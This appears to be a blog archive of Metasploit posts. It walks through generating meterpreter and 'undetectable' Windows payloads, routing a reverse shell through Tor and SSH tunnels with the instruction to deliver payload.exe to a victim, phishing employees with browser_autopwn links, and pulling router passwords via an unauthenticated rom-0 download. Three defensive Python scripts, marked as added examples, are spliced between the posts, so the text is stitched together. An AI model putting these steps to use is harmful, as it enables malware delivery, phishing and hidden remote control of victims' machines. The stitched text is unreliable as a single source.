Showing posts with label metasploit.

27.01.2016

Beef + Armitage [plugin]

git clone https://github.com/benyG/cortana-scripts

copy the beef_strike folder from cortana-scripts into /root/
copy the libraries from the archive (mirror) into the /beef_strike/lib folder
then start Armitage.

Load the beef_strike.cna script (if the beef_strike folder is not located in /root/, edit beef_strike.cna and change the import paths)


11.01.2016

Generate Meterpreter payloads via msfvenom [FAST] (a quick way to create a payload)

A quick way to generate various "basic" Meterpreter payloads via msfvenom 

Install:
Designed for Kali Linux v2.x & Metasploit v4.11+.
Kali v1.x should work.
OSX 10.11+ should work.
Weakerth4n 6+ should work.
...nothing else has been tested.

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Winpayloads - Undetectable Windows Payload Generation [undetectable Windows payload]


git clone https://github.com/Charliedean/Winpayloads
cd Winpayloads
sudo ./setup.sh
python WinPayloads.py

[1] Windows Reverse Shell(Stageless) [Shellter]
[2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence] 
[3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence] 
[4] Windows Reverse Meterpreter(Raw Shellcode) [Base64 Encode]

07.12.2015

meterpreter/reverse_tcp through an intermediate server using SSH tunnels

We use a separate intermediate server as a proxy to which the victim's meterpreter will connect via reverse tcp.
Start a handler in metasploit with meterpreter as the payload and specify the address of the intermediate server:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST KALI_ETH0_IP 
set LPORT LPORT

In the sshd settings of the intermediate server set GatewayPorts yes. Through proxychains4 configured for Tor, first forward ssh to ourselves:

proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP


Then forward the port that meterpreter will connect to:

ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42022


Generate an exe with meterpreter/reverse_tcp as the payload:

msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe


Deliver payload.exe to the victim, run it, enjoy.
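Seen from the defender's side, the setting that makes this relay work is GatewayPorts yes on the intermediate server's sshd (together with remote forwarding being allowed at all). The following audit script is an added example and not part of the original post: it parses an sshd_config the way sshd does (first occurrence of a keyword wins, `Keyword value` or `Keyword=value`, settings after the first Match block are not global) and reports the settings that let a host expose ssh -R forwards to the network. The two config texts are constructed for illustration, and the defaults assumed are stock OpenSSH defaults.

```python
import re

# Stock OpenSSH defaults for the two keywords that govern inbound relaying
# (assumption: an unmodified OpenSSH build).
DEFAULTS = {"gatewayports": "no", "allowtcpforwarding": "yes"}

# Constructed configs for illustration, not taken from any real host.
WEAK_CONFIG = """\
# relay box
Port 22
GatewayPorts yes
AllowTcpForwarding yes
"""

HARDENED_CONFIG = """\
Port 22
GatewayPorts no
AllowTcpForwarding no
Match User deploy
    AllowTcpForwarding local
"""


def parse_sshd_config(text: str) -> dict:
    """Return the effective global value of each keyword in DEFAULTS.

    sshd honours the first occurrence of a keyword and accepts either
    'Keyword value' or 'Keyword=value'. Lines after the first Match block
    apply only to matching connections, so they are not treated as global.
    """
    values = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        m = re.match(r"(\w+)\s*=?\s*(.*)", line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip().lower()
        if key == "match":
            break  # everything below is conditional, not global
        if key in values and key not in seen:
            values[key] = val
            seen.add(key)
    return values


def audit_sshd_config(text: str) -> list:
    """Return findings for settings that let this host relay inbound
    connections the way the post's intermediate server does."""
    v = parse_sshd_config(text)
    findings = []
    if v["gatewayports"] in ("yes", "clientspecified"):
        findings.append(
            f"GatewayPorts {v['gatewayports']}: ports opened with ssh -R may bind "
            "non-loopback addresses, so relayed services are reachable from the network")
    if v["allowtcpforwarding"] in ("yes", "all", "remote"):
        findings.append(
            f"AllowTcpForwarding {v['allowtcpforwarding']}: remote port forwarding "
            "(ssh -R) is permitted for all users")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or "no findings")
```

On a real host, read /etc/ssh/sshd_config into `audit_sshd_config`; the hardened example keeps forwarding off globally and re-enables only local forwarding for one user inside a Match block, which the parser correctly leaves out of the global picture.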

30.08.2015

metasploit db connect postgresql

service postgresql start

You can verify that PostgreSQL is running by checking the output of

ss -ant

and making sure that port 5432 is listening.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*
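Besides confirming that 5432 is listening, the listing above also shows where it is bound: only on 127.0.0.1 and ::1, which is what you want for a local Metasploit database. The script below is an added example, not from the original post; it parses `ss -ant` output (the sample is constructed to mirror the listing above) and reports whether a port is listening and whether it is bound to loopback only.

```python
import subprocess

# Constructed sample, mirrors the listing in the post.
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_listeners(output: str) -> list:
    """Return (address, port) tuples for every LISTEN row of `ss -ant` output."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        # Skip the header and non-listening rows (ESTAB, TIME-WAIT, ...).
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        # The port follows the last ':'; IPv6 addresses contain colons themselves.
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        listeners.append((addr, int(port)))
    return listeners


def check_port(output: str, port: int) -> dict:
    """Summarise where `port` is bound: listening at all, and loopback only?"""
    addrs = sorted({a for a, p in parse_listeners(output) if p == port})
    return {
        "port": port,
        "listening": bool(addrs),
        "addresses": addrs,
        "loopback_only": bool(addrs) and all(a in LOOPBACK for a in addrs),
    }


def main():
    try:
        out = subprocess.run(["ss", "-ant"], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        out = SAMPLE_SS  # no ss available: fall back to the constructed sample
    result = check_port(out, 5432)
    if not result["listening"]:
        print("PostgreSQL is not listening on 5432")
    elif result["loopback_only"]:
        print("PostgreSQL listens on loopback only:", result["addresses"])
    else:
        print("WARNING: PostgreSQL is reachable on", result["addresses"])


if __name__ == "__main__":
    main()
```

The wildcard binds for port 22 (`*` and `::`) come out as not loopback-only, which is the condition you would not want to see for the database port.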

Initialise the Metasploit PostgreSQL Database

With PostgreSQL up and running, we next need to create and initialize the msf database.

msfdb init

Launch msfconsole in Kali

Now that the PostgreSQL service is up and running and the database is initialized, you can launch msfconsole and verify database connectivity with the db_status command as shown below.
msfconsole
msf > db_status
[*] postgresql connected to msf3
msf >

27.08.2015

metasploit other module install

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb

...and files:
  • mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  • g++ -Wall netripper.cpp -o netripper
  • cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  • cd ../Release
  • cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

26.08.2015

Multiple Vulnerabilities [from router to pc reverse shell]


Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant, "admin", and the default password is "admin".
ROM-0 Backup File Disclosure (CVE-2014-4019)

The rom-0 backup file contains sensitive information such as the passwords. The disclosure is that anyone can download that file without any authentication by a simple GET request.

http://192.168.1.1/rom-0
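Because the download needs no authentication, the only trace a defender gets is the request itself. The script below is an added example, not part of the original post: it scans web access log lines in Combined Log Format (assumed to come from the router's admin interface or a reverse proxy in front of it) for requests to /rom-0 and marks the ones the server actually answered with a non-empty 200, i.e. where the backup was handed out. The log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format as written by Apache, nginx or a reverse proxy.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines; addresses and timestamps are made up.
SAMPLE_LOG = """\
192.168.1.23 - - [26/Aug/2015:10:00:01 +0300] "GET / HTTP/1.1" 200 1534
192.168.1.77 - - [26/Aug/2015:10:00:09 +0300] "GET /rom-0 HTTP/1.1" 200 16384
203.0.113.5 - - [26/Aug/2015:10:02:41 +0300] "GET /rom-0?x=1 HTTP/1.1" 401 0
192.168.1.23 - - [26/Aug/2015:10:03:00 +0300] "POST /login.cgi HTTP/1.1" 302 0
192.168.1.77 - - [26/Aug/2015:10:03:30 +0300] "GET /ROM-0 HTTP/1.1" 404 0
"""

# Paths that should never be served without authentication.
SENSITIVE_PATHS = {"/rom-0"}


def find_backup_requests(log_text: str) -> list:
    """Return one record per request for a sensitive backup path.

    `disclosed` is True when the server answered 200 with a non-empty body,
    i.e. the file was actually handed out; other statuses are attempts only.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format, ignore
        # Drop the query string and normalise case before comparing.
        path = urlsplit(m.group("target")).path.lower()
        if path not in SENSITIVE_PATHS:
            continue
        status = int(m.group("status"))
        size = m.group("size")
        hits.append({
            "client": m.group("client"),
            "time": m.group("time"),
            "path": path,
            "status": status,
            "disclosed": status == 200 and size not in ("-", "0"),
        })
    return hits


def disclosed_clients(log_text: str) -> list:
    """Clients that successfully retrieved a backup file, in log order."""
    return [h["client"] for h in find_backup_requests(log_text) if h["disclosed"]]


if __name__ == "__main__":
    for hit in find_backup_requests(SAMPLE_LOG):
        flag = "DISCLOSED" if hit["disclosed"] else "attempt"
        print(f"{hit['time']} {hit['client']} {hit['path']} {hit['status']} {flag}")
```

A 200 for /rom-0 from any client is the indicator that matters; 401 or 404 answers show probing and are worth noting but do not mean the configuration left the device.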

09.05.2015

autopwn browser msf tip


browser_autopwn
In order to use this attack we have to open the metasploit framework and use the browser_autopwn module. In the next image you can see the available options and default settings for this module.


Options of browser autopwn module

We will set LHOST to our IP address, SRVPORT to port 80 (otherwise the link that we have to send to the user must be in the format IP:8080) and URIPATH to / in order to prevent metasploit from setting up random URLs.


Configuring the Browser Autopwn

After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.


Loading the browser exploits

Now we can share the link through our email to the client's employees. If any user opens the malicious link, the autopwn module will try all these exploits in order to see if it can break into the client. If the browser is vulnerable to any of these exploits, meterpreter sessions will open.


Meterpreter sessions opened with Browser Autopwn

Browser-based attacks are not stable. This is because browsers can crash, which means that the meterpreter session or the shell access will be lost. For that reason metasploit will try to migrate to another, more stable process as soon as possible.


Migrate to another process

21.04.2015

exploit/multi/handler


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...